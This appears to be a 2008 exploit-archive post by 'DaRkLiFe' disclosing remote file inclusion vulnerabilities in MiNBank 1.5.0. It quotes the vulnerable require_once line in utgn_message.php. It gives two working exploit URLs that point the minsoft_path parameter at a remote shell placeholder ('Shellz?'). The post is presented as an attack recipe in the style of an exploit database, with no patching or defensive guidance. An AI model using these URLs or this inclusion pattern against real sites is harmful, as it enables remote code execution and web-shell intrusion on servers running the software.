[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MiNBank 1.5.0 Multiple Remote File Inclusion Vulnerability
# Published : 2008-09-30
# Author : DaRkLiFe
# Previous Title : SG Real Estate Portal 2.0 Blind SQL Injection/Local File Inclusion Vulns
# Next Title : eFront <= 3.5.1 / build 2710 Remote Arbitrary Upload Vulnerability
**************************************************************************************
Author : By DaRkLiFe
Greetz : str0ke & S.VV.A.T.
**************************************************************************************
Script :
Micronation Banking System(minba) 1.5.0
Remote File Inclusion Vulnerability(s)
Download:
http://downloads.sourceforge.net/minbank/minba_v0150.zip?modtime=1169500084&big_mirror=0
**************************************************************************************
Exploit : http://site.com/minba/utility/utdb_access.php?minsoft_path=Shellz?
http://site.com/minba/utility/utgn_message.php?minsoft_path=Shellz?
**************************************************************************************
In Multiple files the vulnerability exists.
I have posted two examples
Vulberable : line 3 : require_once("$minsoft_path/utility/utgn_config.php");
in minba/utility/utgn_message.php file
**************************************************************************************
THANKS ! GREETZ !
**************************************************************************************
# www.Syue.com [2008-09-30]